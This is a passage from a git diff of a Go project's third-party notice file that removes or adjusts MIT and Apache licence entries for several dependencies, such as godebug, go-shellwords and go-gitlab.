KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS -FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR -COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER -IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN -CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/karrick/godirwalk Version: v1.15.6 @@ -35230,227 +34540,15 @@ copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. - - --------------------------------------------------------------------------------- -Dependency : github.com/kylelemons/godebug -Version: v1.1.0 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/kylelemons/godebug@v1.1.0/LICENSE: - - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 +all copies or substantial portions of the Software. - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. -------------------------------------------------------------------------------- @@ -35618,37 +34716,6 @@ The above copyright notice and this permission notice shall be included in all c THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. --------------------------------------------------------------------------------- -Dependency : github.com/mattn/go-shellwords -Version: v1.0.7 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/mattn/go-shellwords@v1.0.7/LICENSE: - -The MIT License (MIT) - -Copyright (c) 2017 Yasuhiro Matsumoto - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/mattn/go-sqlite3 Version: v1.9.0 @@ -38167,236 +37234,24 @@ copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - --------------------------------------------------------------------------------- -Dependency : github.com/prometheus/client_golang -Version: v1.1.1-0.20190913103102-20428fa0bffc -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/prometheus/client_golang@v1.1.1-0.20190913103102-20428fa0bffc/LICENSE: - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 +copies or substantial portions of the Software. - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. -------------------------------------------------------------------------------- -Dependency : github.com/rakyll/statik -Version: v0.1.6 +Dependency : github.com/prometheus/client_golang +Version: v1.1.1-0.20190913103102-20428fa0bffc Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/rakyll/statik@v0.1.6/LICENSE: - +Contents of probable licence file $GOMODCACHE/github.com/prometheus/client_golang@v1.1.1-0.20190913103102-20428fa0bffc/LICENSE: Apache License Version 2.0, January 2004 @@ -38586,7 +37441,7 @@ Contents of probable licence file $GOMODCACHE/github.com/rakyll/statik@v0.1.6/LI same "printed page" as the copyright notice for easier identification within third-party archives. - Copyright 2014 Google Inc. + Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -38601,37 +37456,6 @@ Contents of probable licence file $GOMODCACHE/github.com/rakyll/statik@v0.1.6/LI limitations under the License. --------------------------------------------------------------------------------- -Dependency : github.com/reviewdog/errorformat -Version: v0.0.0-20200109134752-8983be9bc7dd -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/reviewdog/errorformat@v0.0.0-20200109134752-8983be9bc7dd/LICENSE: - -MIT License - -Copyright (c) 2016 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/rogpeppe/fastuuid Version: v1.2.0 @@ -40332,218 +39156,6 @@ OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. --------------------------------------------------------------------------------- -Dependency : github.com/xanzy/go-gitlab -Version: v0.22.3 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/xanzy/go-gitlab@v0.22.3/LICENSE: - -Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "{}" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright {yyyy} {name of copyright owner} - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - - -------------------------------------------------------------------------------- Dependency : github.com/xdg/stringprep Version: v1.0.0 diff --git a/generator/_templates/beat/{beat}/tools/tools.go b/generator/_templates/beat/{beat}/tools/tools.go index edd121e211b9..289a0a2cb705 100644 --- 